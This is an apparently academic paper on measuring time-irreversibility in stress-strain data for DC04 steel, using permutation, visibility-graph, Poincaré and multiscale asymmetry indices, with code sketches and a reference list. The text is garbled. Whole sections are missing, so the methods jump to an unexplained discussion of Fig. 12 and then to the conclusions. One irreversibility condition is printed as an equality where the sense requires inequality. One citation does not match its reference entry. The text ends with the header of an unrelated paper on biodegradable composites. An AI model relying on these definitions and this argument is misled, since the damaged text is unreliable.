Abstract. The process of plastic deformation of steel DC04 is considered as a complex, non-linear, irreversible, and self-organized process. An analysis of the irreversibility of the stress-strain time series makes it possible to identify the characteristic areas of (quasi-)elastic deformation, plastic deformation, and necking. The last two sections are the most informative. The region of inelastic deformation is characterized by collective self-organized processes of transformation of dislocation structures, turning into pore formation and, ultimately, the formation of microcracks and a general crack as the cause of sample failure. Measures for the quantitative assessment of the irreversibility of the deformation process are proposed. Multiscale asymmetry, Poincaré-, network-, and permutation-based measures are found to be especially informative; they can be used not only to classify the stages of plastic deformation but also as precursors of the material's irreversible destruction process. Keywords: Complex systems · plastic deformation · dislocation · network measures · permutation indicators · self-organization
1 Introduction

It should be noted that due attention has been paid to the problems of complexity over the last half century. There are known fundamental works in this direction by P. Anderson [1], M. Gell-Mann [24], I. Prigogine [48], and G. Parisi [45]. With an obvious variety of definitions, a complex system is understood as a large set of components that locally interact with each other on small scales and can spontaneously self-organize, demonstrating non-trivial global structures and behavior on large scales, often without external intervention. Such systems are also non-linear, heterogeneous, and far from equilibrium, as well as adaptive as they develop, and may contain self-managing feedback loops. The properties of a complex system cannot be understood or predicted only from complete knowledge of its components, and its study requires new mathematical frameworks and scientific methodologies [34].
A non-exhaustive list of complex systems includes, among others (in fact, most systems can be considered complex systems): geophysical processes (earthquakes), biophysics (brain dynamics, DNA), space plasma (solar wind, solar flares, Earth's magnetosphere), plastic deformation of materials, economics (stock indices), socio-technical systems and many others [53]. In addition, for the analysis of experimental data (time series) of complex systems, new concepts and sophisticated mathematical tools have been developed to extract important information about the underlying dynamics of the observed signals. The theory of complex networks, which has appeared in recent years and is actively developing, has significantly expanded the tools for analyzing time series by transforming them into one of a variety of complex networks [63].

One of the fundamental problems of physical materials science is the explanation of the complex regularities, observed in experiment, of the emergence and development of the defect structures that form during the plastic deformation of a material. A deformable material is a complex dynamic system in which, under the influence of an external load, the material is transferred to a state far from thermodynamic equilibrium. This leads to the development of dissipative instabilities in the system, leading to the formation of various types of inhomogeneous defect structures, including dislocation structures.

Plastic deformation of metals is spatially inhomogeneous and discontinuous in time due to the discrete nature of plasticity carriers – lattice dislocations [60]. The discreteness of dislocation processes is the root cause of local fluctuations in stresses and strains. However, a typical stress-strain curve taken with the accuracy of modern equipment turns out to be smooth. The reason for this is that the global stress-strain curve is the result of averaging over the deformed volume and time, and as such does not reveal the discontinuity of plastic flow. However, the rate of change of this curve contains fluctuations, the analysis of whose time series makes it possible to obtain far from obvious information [34].

Non-equilibrium dissipative systems are characterized by the irreversibility of time, and the loss of this fundamental property may be an indicator of the development of destructive processes [9, 10]. The development of irreversibility during the destruction of the material may serve as a warning signal of complete failure.

The aim of this study is to analyze the irreversibility regimes of the time series of the stress-strain curve σ(ε) and to present indicators (indicators-precursors) of destructive processes related to the concept of irreversibility.
2 Materials and Methods Considering the statistical properties of a signal under study, its evolution could be called irreversible if there is a lack of invariance, i.e., the signal is time-reversible if a series {x1 , x2 , . . . , xn } and its inverse version {xn , xn−1 , . . . , x1 } are equally likely to occur. The function f (·) could be applied to find characteristics that differ forward and backward versions, i.e., time series is reversible if f (X d ) = f (X r ). Therefore, the opposite relation is true for irreversible processes: if f (X d ) = f (X r ), the process is (statistically) time-irreversible [18]. The main idea of this definition – there are no restrictions on f (·).
Our study implies that a stationary process X is called statistically inverse in time if the probability distributions of some quantities for the initial and time-reversed system remain approximately the same [14, 18, 62]. Reversible systems are expected to be white noise or linearly correlated Gaussian processes. The irreversibility of time series indicates the presence of nonlinear dependencies (memory) [49] in the dynamics of a system far from equilibrium, including non-Gaussian (linear or nonlinear) random processes, dissipative chaos, or linear autoregressive moving average (ARMA) models as possible generative processes of such irreversible dynamics [12, 37, 58].

Various systems exhibit asymmetric patterns in their evolution. As an example, Ji and Shang [26] studied the possibility of using the Kullback-Leibler divergence (KLD) for the detection and isolation of a sensor precision degradation fault. Shaohua et al. [52] presented a hybrid damage index on the basis of KLD and its approximations for detecting damage in a one-dimensional structure and delamination in laminated composites. Osara and Bryant [44] presented a new instantaneous fatigue model and predictor based on irreversible thermodynamics, which combines the first and second laws of thermodynamics with the Helmholtz free energy. The result was then applied to the degradation-entropy generation theorem to relate a desired fatigue measure to the loads, materials, and environmental conditions via the irreversible entropies generated by the dissipative processes that degrade the fatigue material. Filippatos et al. [17] presented a vibration-based damage identification method that takes into consideration the gradual damage behavior and the resulting changes in the structural dynamic behavior of composite rotors. Their diagnostic system was based on KLD, the two-sample Kolmogorov-Smirnov test, and a statistical hidden Markov model. Li and Shang [38] presented a multiscale higher-moments KLD to make the variation of irreversibility more obvious and studied it for different scales with the usage of the coarse-graining procedure. Qiu et al. [50] applied KLD as a degradation index to estimate structure damage by measuring the difference between a baseline Gaussian Mixture Model and an on-line Gaussian Model. Kahirdeh et al. [28] presented a parametric approach to estimating the acoustic entropy detected over the course of fatigue damage. Information entropy and relative entropy were estimated through a parametric approach, and the evolution trends of both showed the stages of fatigue damage. Basaran and Nie [3] developed a thermodynamic framework for the damage mechanics of solid materials, where entropy production was used as the sole measure of damage evolution in the system. Boschan et al. [8] investigated irreversibility in soft frictionless disk packings on approach to the unjamming transition. Kostina and Plekhov [33] presented a theoretical approach to the calculation of entropy in metals under plastic deformation; via a thermodynamic analysis of the plastic deformation process, they obtained an expression for the determination of the entropy production. For measuring the dependence among different degradation processes, Sun et al. [59] adopted copula entropy, which is a combination of the copula function and information entropy. Delpha et al.
[13] developed a fault detection and isolation method based on data-driven approaches: Principal Component Analysis and KLD, which were used for feature extraction and comparison of the probability density functions of the latent scores. In [42], the authors presented a new technique for the construction of a concrete-beam health indicator based on the KLD and deep learning.
As has been mentioned previously, in this paper we present some of the techniques mentioned in the short literature review, such as KLD. Next, we present the measures of irreversibility based on permutation patterns and network quantities in combination with information theory. Moreover, we present Poincaré-based indicators of irreversibility and a multiscale index of asymmetry. By constructing irreversibility indicators for the stress-strain curve based on different approaches and using sliding windows of different lengths, we demonstrate, first of all, the versatility and stability of the presented measures regardless of the length of the series. Secondly, the presented work offers prospects for constructing precursors of catastrophic processes during the destruction of metals.

2.1 Permutation-Based Irreversibility

The idea of analyzing permutation patterns (PP) was initially introduced by Bandt and Pompe [2] to provide researchers with a simple and efficient tool to characterize the complexity of the dynamics of real systems. Compared to other approaches, such as entropies, fractal dimensions, or Lyapunov exponents, it avoids amplitude thresholds and, instead of dealing with the raw values inherited from the time series dynamics, deals with ordinal permutation patterns. Their frequencies allow us to distinguish deterministic processes from completely random ones.

The calculations of PP assume that the time series X = {x(i) | i = 1, ..., N} is partitioned into overlapping subvectors X(i) = {x(i), x(i + τ), ..., x(i + [dE − 1]τ)}, where dE is the length of the corresponding vectors (the number of elements to be compared) and τ is the embedding delay that controls the time separation between elements. After the embedding procedure, each subvector is mapped to an ordinal PP π = (r0, r1, ..., r_{dE−1}) of {0, 1, ..., dE − 1}, which has to fulfill the condition x(i + r0) ≤ x(i + r1) ≤ ··· ≤ x(i + r_{dE−1}).

The measure of time irreversibility based on PP that interests us can be derived by taking into account the relative frequencies of the patterns for both the initial and the reversed time series. Correspondingly, if both have approximately the same probability distributions of their patterns, the time series is presented to be reversible, with the opposite conclusion in the other case. The difference between the distributions of the direct (Pd) and reversed (Pr) time series can be estimated via Eq. (1) below.

For both permutation- and network-based quantities, we will utilize the probability density functions (PDFs) of the mentioned quantities. If our system is presented to be time-reversible, we conjecture that the probability distributions of the forward and backward in time characteristics should be the same. For irreversible processes, we expect to find statistical non-equivalence. According to [62], this deviation will be defined through the Kullback-Leibler divergence:

D_{KL}(p||q) = \sum_{i=1}^{N} p(x_i) \log \frac{p(x_i)}{q(x_i)},   (1)
for which p corresponds to a distribution of the retarded characteristics and q to that of the advanced ones. Besides, the similarity of both quantities can be assessed through the Jensen-Shannon distance [21]:

JS(p||q) = \sqrt{ \frac{D_{KL}(p||m) + D_{KL}(q||m)}{2} },   (2)

where m = (p + q)/2, and D_{KL}(·) is the Kullback-Leibler divergence. Specifically, as the relative frequency of the PP for the initial time series becomes the same as for the inverse time series, reversibility implies equality of both distributions, and these distances converge to zero.

For the permutation-based irreversibility, we tested different combinations of the embedding dimension and time delay. The experiments were performed for dE ∈ {4, 5} and τ ∈ {3, ..., 15}. We found that dE = 4 and τ = 15 give the most robust results across all sliding window sizes.

2.2 Complex Network Methods

Visibility graphs (VGs) are based on a simple mapping from the time series to the network domain exploiting the local convexity of a scalar-valued time series {xi | i = 1, ..., N}, where each observation xi is a vertex in a complex network. Two vertices i and j are linked by an edge (i, j) if for all vertices k with ti < tk < tj the condition

x_k < x_i + (x_j − x_i) \cdot \frac{t_k − t_i}{t_j − t_i}

is fulfilled.
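A minimal Python sketch of the permutation-based measure of Sect. 2.1, combining the ordinal-pattern statistics with Eqs. (1) and (2). The test signals (white noise vs. an asymmetric sawtooth) are illustrative stand-ins, not the DC04 stress-strain data, and the ε-regularization of patterns missing from one distribution is also an assumption of this sketch.

```python
import numpy as np
from collections import Counter

def pattern_probs(x, dE=4, tau=15):
    """Relative frequencies of ordinal permutation patterns (Sect. 2.1)."""
    n = len(x) - (dE - 1) * tau
    pats = [tuple(np.argsort(x[i:i + dE * tau:tau])) for i in range(n)]
    return {p: c / n for p, c in Counter(pats).items()}

def kld(p, q, eps=1e-12):
    """Eq. (1); eps regularizes patterns absent from one distribution."""
    keys = set(p) | set(q)
    return sum(p.get(k, eps) * np.log(p.get(k, eps) / q.get(k, eps)) for k in keys)

def js_distance(p, q):
    """Eq. (2): Jensen-Shannon distance between two pattern distributions."""
    keys = set(p) | set(q)
    m = {k: 0.5 * (p.get(k, 0) + q.get(k, 0)) for k in keys}
    return np.sqrt(0.5 * (kld(p, m) + kld(q, m)))

rng = np.random.default_rng(0)
noise = rng.normal(size=20000)  # reversible: both measures ~ 0
saw = (np.arange(20000) % 100) / 100 + 0.05 * rng.normal(size=20000)  # irreversible

for x in (noise, saw):
    p, q = pattern_probs(x), pattern_probs(x[::-1])
    print(kld(p, q), js_distance(p, q))
```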
2.3 Poincaré-Based Indicators of Irreversibility

In the Poincaré diagram, each pair of consequent values (g(t), g(t + τ)) of the standardized returns of the studied series is mapped onto a two-dimensional plane. By assessing the asymmetry of points in the diagram relative to the line of identity (LI), we can derive various quantitative measures of irreversibility (asymmetry) of the studied systems. For all of the presented Poincaré-based indicators, except Costa's index and the asymmetry index, τ = 1. Thus, in the Poincaré diagram we assess the overall asymmetry regarding the current and the next state. Figure 1 represents the Poincaré diagram for the standardized returns of the stress-strain curve.
Fig. 1. The Poincaré plot of the standardized returns g(t) for the stress-strain curve. The solid line represents the line of identity. Each dot is the representation of consequent values (g(t), g(t + τ ))
From Fig. 1 we see that one of the presented points is followed by a transition from approximately 76σ for g(t) to 6σ for g(t + τ). Such events and the presented distribution of points on the Poincaré diagram confirm that the system we are studying is characterized by irreversibility: the nonlinearity of the studied processes and their randomness (sensitivity to certain conditions).
2.3.1 Porta's Index (PIx)

PIx [47] was defined as the number of points below LI divided by the total number of points in the Poincaré plot except those that are located on LI, specifically

$$PIx = \frac{b}{m}, \qquad (5)$$
where $b = C(P_i^-)$ is the number of points below LI, and $m = C(P_i^+) + C(P_i^-)$ is the total number of points below and above LI.

2.3.2 Guzik's Index (GIx)

GIx was defined as the distance of the points above LI divided by the distance of all points in the Poincaré plot except those that are located on LI [9, 22]. Specifically,

$$GIx = \frac{\sum_{i=1}^{a} (D_i^+)^2}{\sum_{i=1}^{m} (D_i)^2}, \qquad (6)$$
where $a = C(P_i^+)$ denotes the number of points above LI; $m = C(P_i^+) + C(P_i^-)$ is the number of points in the Poincaré plot except those that lie on LI; $D_i^+$ is the distance of the points above LI to the line itself, and $D_i$ is the distance of the point $P_i(g(i), g(i+\tau))$ to LI, which can be defined as

$$D_i = \frac{|g(i + \tau) - g(i)|}{\sqrt{2}}. \qquad (7)$$
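Eqs. (5)–(7) translate almost line-for-line into code. The sketch below is an illustration; it assumes that points lying exactly on LI are simply discarded, as the definitions require.

```python
import numpy as np

def porta_guzik(pts):
    """PIx (Eq. 5) and GIx (Eq. 6) for a Poincare cloud pts = (g(i), g(i+tau))."""
    d = (pts[:, 1] - pts[:, 0]) / np.sqrt(2.0)    # signed distance to LI, Eq. (7)
    d = d[d != 0.0]                               # drop points lying on LI
    pix = np.sum(d < 0) / d.size                  # fraction of points below LI
    gix = np.sum(d[d > 0] ** 2) / np.sum(d ** 2)  # squared-distance share above LI
    return pix, gix
```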
2.3.3 Costa's Index (CIx)

Costa's index [11] represents a simplified version of [9], where the numbers of increments (g(t + τ) − g(t) > 0) and decrements (g(t + τ) − g(t) < 0) are taken into account. They are presented to be symmetric if equal to each other. The procedure is implemented for the multiscale two-dimensional plane (g(t), g(t + τ)), where the new coarse-grained series $y_\tau(t) = g(t + \tau) - g(t)$ for $1 \le t \le N - \tau$ displays the asymmetry of the increment series, and the time irreversibility index over a range of scales τ is calculated by the following equation:

$$CIx(\tau) = \sum_{t} H\big(y_\tau(t)\big) - \sum_{t} H\big(-y_\tau(t)\big), \qquad (8)$$

where H(·) is the Heaviside step function, so that the two sums count the increments and the decrements, respectively.

2.3.4 Ehlers' Index (EIx)

Ehlers' index [16] characterizes the asymmetry of the increment series through its third moment (skewness), so that an excess of pronounced increments over decrements yields a non-zero value. For EIx ≈ 0, the studied segment is presented to be reversible.

2.3.5 Area Index (AIx)

AIx [61] is defined as the cumulative area of the sectors corresponding to the points that are located above the line of identity (LI) divided by the cumulative area of the sectors corresponding to all points in the Poincaré plot (except those that are located exactly on LI). The area of the sector corresponding to a particular point Pi in the Poincaré plot is calculated as

$$S_i = \frac{1}{2} \cdot R_{\theta_i} \cdot r^2, \qquad (11)$$

for which r is the radius of the sector; $R_{\theta_i} = \theta_{LI} - \theta_i$; $\theta_{LI}$ is the phase angle of LI, and $\theta_i = \arctan\big(g(i+\tau)/g(i)\big)$, which defines the phase angle of the i-th point. Then, AIx is calculated according to the following equation:

$$AIx = \frac{\sum_{i=1}^{a} |S_i|}{\sum_{i=1}^{m} |S_i|}, \qquad (12)$$
where $a = C(P_i^+)$ denotes the number of points above LI, and m is the overall number of points in the Poincaré plot (except those that are located exactly on LI).

2.3.6 Slope Index (SIx)

In addition to the measures presented above, it was proposed to calculate the irreversibility of a signal from the ratio of the phase angles of the points above LI to those of all points in the Poincaré plot [30]:

$$SIx = \frac{\sum_{i=1}^{a} |R_{\theta_i}|}{\sum_{i=1}^{m} |R_{\theta_i}|}. \qquad (13)$$

2.4 Multiscale Time Irreversibility Index

For the following procedure [9], first of all, we need to construct a coarse-grained time series, which can be defined as

$$y_\tau(j) = \frac{1}{\tau} \sum_{i=(j-1)\tau + 1}^{j\tau} g(i), \quad \text{for } 1 \le j \le \frac{N}{\tau}. \qquad (14)$$
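A sketch of the coarse-graining in Eq. (14) is given below, together with the discrete asymmetry estimate that the following paragraph arrives at (Eq. (17)). The histogram binning of the coarse-grained values is our assumption, not a choice stated in the text.

```python
import numpy as np

def coarse_grain(g, tau):
    """Eq. (14): non-overlapping window averages of length tau."""
    n = len(g) // tau
    return g[: n * tau].reshape(n, tau).mean(axis=1)

def asymmetry_index(g, tau, bins=50):
    """Discrete multiscale asymmetry, Eq. (17): positive and negative
    coarse-grained returns enter with their empirical probabilities."""
    y = coarse_grain(g, tau)
    pr, edges = np.histogram(y, bins=bins)
    pr = pr / pr.sum()
    centers = 0.5 * (edges[:-1] + edges[1:])
    nz = pr > 0
    terms = pr[nz] * np.log(pr[nz])
    pos = terms[centers[nz] > 0].sum()
    neg = terms[centers[nz] < 0].sum()
    return pos - neg          # A(tau) > 0 indicates irreversibility at scale tau
```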
Then, using a statistical physics approach, we make the simplifying assumption that each transition (increase or decrease of $y_\tau(j)$) is independent and requires a specific amount of "energy" E. The probability density function of this class of systems [27] can be assumed to follow

$$\rho \propto e^{-\beta E - \gamma Q}, \qquad (15)$$

where Q represents the non-equilibrium heat flux across the boundary of the system, and β and γ are the Lagrange multipliers derived from the constraints on the average value of the energy E per transition and the average contribution of each transition to the heat flux Q. Since the time-reversal operation on the original time series inverts an increase into a decrease and vice versa, the difference between the average energy for the activation of the information rate, i.e. $\langle \beta E + \gamma Q \rangle_{y_\tau > 0}$, and the relaxation of the information rate, i.e. $\langle \beta E + \gamma Q \rangle_{y_\tau < 0}$, defines the asymmetry index

$$A(\tau) = \langle \beta E + \gamma Q \rangle_{y_\tau > 0} - \langle \beta E + \gamma Q \rangle_{y_\tau < 0}, \qquad (16)$$

and the time series may be reversible for scale τ in the case when A(τ) = 0. For the analysis of discrete values, Eq. (16) can be presented as

$$A(\tau) = \sum_{y_\tau > 0} \Pr(y_\tau) \ln \Pr(y_\tau) - \sum_{y_\tau < 0} \Pr(y_\tau) \ln \Pr(y_\tau), \qquad (17)$$

and the time series is presented to be irreversible if A(τ) > 0 is satisfied.

Accordingly, to satisfy the above two conditions at the critical stages of strain hardening, it is necessary for $dS_e$ to be negative, i.e. the entropy tends to decrease. At the same time, the paired autocorrelation function demonstrates noticeable processes of self-organization in these areas (Fig. 12) [51].
Fig. 12. Dynamics of the Shannon entropy (ShEn) and the autocorrelation function (Ac) at the moments of self-organized plastic strain localization avalanches
Figure 12 also shows the dynamics of Shannon entropy. It is obvious that the characteristic sharp jumps (“dips”) in the value of ShEn in the region of the onset of plastic flow and the region of global crack formation correspond to self-organization processes.
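The two indicators juxtaposed in Fig. 12 are easy to estimate per sliding window. The sketch below is one possible implementation; the window width, step and histogram binning are chosen arbitrarily here rather than taken from the paper.

```python
import numpy as np

def shannon_entropy(window, bins=30):
    """Empirical Shannon entropy (ShEn) of one sliding window."""
    p, _ = np.histogram(window, bins=bins)
    p = p[p > 0] / p.sum()
    return -np.sum(p * np.log(p))

def lag1_autocorr(window):
    """Paired (lag-1) autocorrelation (Ac) of one sliding window."""
    w = window - window.mean()
    return np.sum(w[:-1] * w[1:]) / np.sum(w * w)

def sliding_indicators(series, width=500, step=50):
    idx = range(0, len(series) - width + 1, step)
    ent = np.array([shannon_entropy(series[i : i + width]) for i in idx])
    ac = np.array([lag1_autocorr(series[i : i + width]) for i in idx])
    return ent, ac   # dips in ShEn together with high Ac flag self-organization
```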
6 Conclusions

In this study, we have presented measures for a quantitative assessment of the irreversibility of deformation processes. For the first time, the multiscale asymmetry coefficient and the Poincaré-, network- and permutation-based measures are found to be especially informative, and they can be used not only to monitor and classify the stages of deformation but also as precursors of the irreversible destruction of the material. We have tested the possibility of detecting periods of irreversibility with the presented measures on the example of the stress-strain curve time series σ(ε) for DC04 steel. Our results have shown that the regimes of the transition from the elastic to the plastic region and the fracture area are presented to be irreversible, whereas all other regimes seem to be globally reversible. We could see that the emergence and development of the defect structures that appear during the deformation of metals form complex, non-linear, heterogeneous, i.e. self-organized, dynamics, which is far from thermodynamic equilibrium. The identified regimes of self-organization (instability) are characterized by asymmetry in their dynamics and low entropy production in the deforming metal, and this is supported by a high autocorrelation (long-term memory) effect. Further, it would be interesting to study the formation of inhomogeneous defect structures with the use of multifractal [4, 15, 19, 20, 23, 25, 29, 40, 46, 57], information [4, 55, 56], network [4, 5, 63], chaos theory [54, 57], or machine (deep) learning [31] approaches.

Acknowledgements. This work was supported in part by the Ministry of Education and Science of Ukraine (projects No. 0121U109543, 0122U000850, and 0122U000874) and the National Research Foundation of Ukraine (project No. 2020.02/0100). T.K. also acknowledges the SAIA (Slovak Academic Information Agency) for a scholarship at the Institute of Physics of the Slovak Academy of Sciences in the framework of the National Scholarship Programme of the Slovak Republic.
References 1. Anderson, P.W.: More is different. Broken symmetry and the nature of the hierarchical structure of science. Science 177, 393–396 (1972) 2. Bandt, C., Pompe, B.: Permutation entropy: a natural complexity measure for time series. Phys. Rev. Lett. 88, 174102 (2002) 3. Basaran, C., Nie, S.: An irreversible thermodynamics theory for damage mechanics of solids. Int. J. Damage Mech. 13, 205–223 (2004) 4. Bielinskyi, A., Semerikov, S., Serdyuk, O., Solovieva, V., Soloviev, V., Pichl, L.: Econophysics of sustainability indices. In: CEUR Workshop Proceedings, vol. 2713, pp. 372–392 (2020) 5. Bielinskyi, A., Soloviev, V.: Complex network precursors of crashes and critical events in the cryptocurrency market. In: CEUR Workshop Proceedings, vol. 2292, pp. 37–45 (2018) 6. Bielinskyi, A.O., Hushko, S.V., Matviychuk, A.V., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Irreversibility of financial time series: a case of crisis. In: CEUR Workshop Proceedings, vol. 3048, pp. 134–150 (2021) 7. Bielinskyi, A.O., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Econophysics of cryptocurrency crashes: a systematic review. In: CEUR Workshop Proceedings, vol. 3048, pp. 31–133 (2021)
8. Boschan, J., Luding, S., Tighe, B.P.: Jamming and irreversibility. Granular Matter 21(3), 1–7 (2019) 9. Costa, M., Goldberger, A.L., Peng, C.K.: Broken asymmetry of the human heartbeat: loss of time irreversibility in aging and disease. Phys. Rev. Lett. 95, 198102 (2005) 10. Costa, M., Goldberger, A.L., Peng, C.K.: Multiscale entropy analysis of biological signals. Phys. Rev. E 71, 021906 (2005) 11. Costa, M.D., Peng, C.K., Goldberger, A.L.: Multiscale analysis of heart rate dynamics: entropy and time irreversibility measures. Cardiovasc. Eng. 8, 88–93 (2008) 12. Cox, D.R., Hand, D., Herzberg, A.: Foundations of Statistical Inference, Theoretical Statistics, Time Series and Stochastic Processes. Cambridge University Press, London (2005) 13. Delpha, C., Diallo, D., Wang, T., Liu, J., Li, Z.: Multisensor fault detection and isolation using Kullback-Leibler divergence: application to data vibration signals. In: 2017 International Conference on Sensing, Diagnostics, Prognostics, and Control (SDPC), Shanghai, China (2017) 14. Donges, J.F., Donner, R.V., Kurths, J.: Testing time series irreversibility using complex network methods. EPL 102, 10004 (2013) 15. Drożdż, S., Oświęcimka, P.: Detecting and interpreting distortions in hierarchical organization of complex time series. Phys. Rev. E 91, 030902 (2015) 16. Ehlers, C.L., Havstad, J., Prichard, D., Theiler, J.: Low doses of ethanol reduce evidence for nonlinear structure in brain activity. J. Neurosci. 18, 7474–7486 (1998) 17. Filippatos, A., Langkamp, A., Kostka, P., Gude, M.: Sequence-based damage identification method for composite rotors by applying the Kullback-Leibler divergence, a two-sample Kolmogorov-Smirnov test and a statistical hidden Markov model. Entropy 21, 690 (2019) 18. Flanagan, R., Lacasa, L.: Irreversibility of financial time series: a graph-theoretical approach. Phys. Lett. A 380, 1689 (2016) 19. Frisch, U., Parisi, G.: On the singularity structure of fully developed turbulence. In: Ghil, M., Benzi, R., Parisi, G. (eds.) Turbulence and Predictability of Geophysical Flows and Climate Dynamics, pp. 84–88. North-Holland, New York (1985) 20. Grassberger, P.: Generalized dimensions of strange attractors. Phys. Lett. A 97, 227–230 (1983) 21. Grosse, I., Bernaola-Galván, P., Carpena, P., Román-Roldán, R., Oliver, J., Stanley, H.E.: Analysis of symbolic sequences using the Jensen-Shannon divergence. Phys. Rev. E 65, 041905 (2002) 22. Guzik, P., Piskorski, J., Krauze, T., Wykretowicz, A., Wysocki, H.: Heart rate asymmetry by Poincaré plots of RR intervals. Biomedizinische Technik. Biomed. Eng. 51, 272–275 (2006) 23. Halsey, T.C., Jensen, M.H., Kadanoff, L.P., Procaccia, I., Shraiman, B.I.: Fractal measures and their singularities – the characterization of strange sets. Phys. Rev. A 33, 1141–1151 (1986) 24. Gell-Mann, M.: What is complexity? Complexity 1, 16–19 (1995) 25. Hurst, H.E.: Long-term storage capacity of reservoirs. Trans. Am. Soc. Civ. Eng. 116, 770–799 (1951) 26. Ji, H., He, X., Zhou, D.: Diagnosis of sensor precision degradation using Kullback-Leibler divergence. Can. J. Chem. Eng. 96, 434–443 (2018) 27. Jou, D., Casas-Vazquez, J., Lebon, G.: Extended irreversible thermodynamics. Rep. Prog. Phys. 51, 1105 (1988) 28. Kahirdeh, A., Sauerbrunn, C., Yun, H., Modarres, M.: A parametric approach to acoustic entropy estimation for assessment of fatigue damage. Int. J. Fatigue 100(part 1), 229–237 (2017) 29. Kantelhardt, J.W., Zschiegner, S.A., Koscielny-Bunde, E., Bunde, A., Havlin, S., Stanley, H.E.: Multifractal detrended fluctuation analysis of non-stationary time series. Phys. A 316, 87–114 (2002)
30. Karmakar, C.K., Khandoker, A.H., Palaniswami, M.: Phase asymmetry of heart rate variability signal. Physiol. Meas. 36, 303–314 (2015) 31. Kiv, A.E., et al.: Machine learning for prediction of emergent economy dynamics. In: CEUR Workshop Proceedings, vol. 3048, pp. i–xxxi (2021) 32. Kocańda, A., Jasiński, C.: Extended evaluation of Erichsen cupping test results by means of laser speckle. Arch. Civil Mech. Eng. 16(2), 211–216 (2015) 33. Kostina, A., Plekhov, O.: The entropy of an Armco iron under irreversible deformation. Entropy 17, 264–276 (2015) 34. Kwapień, J., Drożdż, S.: Physical approach to complex systems. Phys. Rep. 515, 115–226 (2012) 35. Lacasa, L., Flanagan, R.: Time reversibility from visibility graphs of nonstationary processes. Phys. Rev. E 92, 022817 (2015) 36. Lacasa, L., Nuñez, A., Roldán, É.: Time series irreversibility: a visibility graph approach. Eur. Phys. J. B 85, 217 (2012) 37. Lawrance, A.: Directionality and reversibility in time series. Int. Stat. Rev. 59, 67–79 (1991) 38. Li, J., Shang, P.: Time irreversibility of financial time series based on higher moments and multiscale Kullback-Leibler divergence. Phys. A 502, 248–255 (2018) 39. Luque, B., Lacasa, L., Ballesteros, F., Luque, J.: Horizontal visibility graphs: exact results for random time series. Phys. Rev. E 80, 046103 (2009) 40. Meakin, P.: Fractals, Scaling and Growth far from Equilibrium. Cambridge University Press, Cambridge (1998) 41. Newman, M.E.J.: The structure and function of complex networks. SIAM Rev. 45, 167–256 (2003) 42. Nguyen, T.K., Ahmad, Z., Kim, J.M.: A deep-learning-based health indicator constructor using Kullback-Leibler divergence for predicting the remaining useful life of concrete structures. Sensors (Basel) 22, 3687 (2022) 43. Nicolis, G., Prigogine, I.: Self-organization in Nonequilibrium Systems: From Dissipative Structures to Order Through Fluctuations. Wiley, New York (1977) 44. Osara, J.A., Bryant, M.D.: Thermodynamics of fatigue: degradation-entropy generation methodology for system and process characterization and failure analysis. Entropy 21, 685 (2019) 45. Parisi, G.: Complex systems: a physicist's viewpoint. Phys. A 263, 557–564 (1999) 46. Peng, C.K., Buldyrev, S.V., Havlin, S., Simons, M., Stanley, H.E., Goldberger, A.L.: Mosaic organization of DNA nucleotides. Phys. Rev. E 49, 1685–1689 (1994) 47. Porta, A., Guzzetti, S., Montano, N., Gnecchi-Ruscone, T., Furlan, R., Malliani, A.: Time reversibility in short-term heart period variability. In: Computers in Cardiology, pp. 77–80. IEEE (2006) 48. Prigogine, I.: Exploring complexity. Eur. J. Oper. Res. 30, 97–103 (1987) 49. Puglisi, A., Villamaina, D.: Irreversible effects of memory. EPL 88, 30004 (2009) 50. Qiu, L., Yuan, S., Bao, Q., Huang, T.: An on-line continuous updating Gaussian mixture model for damage monitoring under time-varying structural boundary condition. In: EWSHM – 7th European Workshop on Structural Health Monitoring. IFSTTAR, Inria, Université de Nantes, Nantes, France (2014) 51. Sethna, J.P., et al.: Deformation of crystals: connections with statistical physics. Annu. Rev. Mater. Res. 47, 217–246 (2017) 52. Shaohua, T., Zhibo, Y., Zhengjia, H., Xuefeng, C.: Damage identification by the Kullback-Leibler divergence and hybrid damage index. Shock. Vib. 2014, 22 (2014) 53. Siegenfeld, A.F., Bar-Yam, Y.: An introduction to complex systems science and its applications. Complexity 2020, 1–16 (2020)
54. Soloviev, V., Bielinskyi, A., Serdyuk, O., Solovieva, V., Semerikov, S.: Lyapunov exponents as indicators of the stock market crashes. In: CEUR Workshop Proceedings, vol. 2732, pp. 455–470 (2020) 55. Soloviev, V., Bielinskyi, A., Solovieva, V.: Entropy analysis of crisis phenomena for DJIA index. In: CEUR Workshop Proceedings, vol. 2393, pp. 434–449 (2019) 56. Soloviev, V.N., Bielinskyi, A.O., Kharadzjan, N.A.: Coverage of the coronavirus pandemic through entropy measures. In: CEUR Workshop Proceedings, vol. 2832, pp. 24–42 (2020) 57. Sornette, D.: Critical Phenomena in Natural Sciences: Chaos, Fractals, Self-organization and Disorder: Concepts and Tools. Springer, Heidelberg (2006). https://doi.org/10.1007/3-540-33182-4 58. Stone, L., Landan, G., May, R.M.: Detecting time's arrow: a method for identifying nonlinearity and deterministic chaos in time-series data. Proc. R. Soc. Lond. B 263, 1509–1513 (1996) 59. Sun, F., Zhang, W., Wang, N., Zhang, W.A.: Copula entropy approach to dependence measurement for multiple degradation processes. Entropy 21, 724 (2019) 60. Vinogradov, A., Yasnikov, I.S., Estrin, Y.: Stochastic dislocation kinetics and fractal structures in deforming metals probed by acoustic emission and surface topography measurements. J. Appl. Phys. 115, 1–10 (2014) 61. Yan, C., et al.: Area asymmetry of heart rate variability signal. BioMed. Eng. OnLine 16, 112 (2017) 62. Zanin, M., Rodríguez-González, A., Menasalvas Ruiz, E., Papo, D.: Assessing time series reversibility through permutation patterns. Entropy 20, 665 (2018) 63. Zou, Y., Donner, R.V., Marwan, N., Donges, J.F., Kurths, J.: Complex network approaches to nonlinear time series analysis. Phys. Rep. 787, 1–97 (2019) 64. Zuev, L.B., Barannikova, S.A.: Autowaves of localized plastic flow, velocity of propagation, dispersion, and entropy. Phys. Met. Metallogr. 112, 109 (2011)
Computer Modeling of Chemical Composition of Hybrid Biodegradable Composites Vladimir Lebedev(B) , Denis Miroshnichenko, Dmytro Savchenko, Daria Bilets, Vsevolod Mysiak, and Tetiana Tykhomyrova Kharkiv Polytechnic Institute, Kharkiv, Ukraine [email protected]
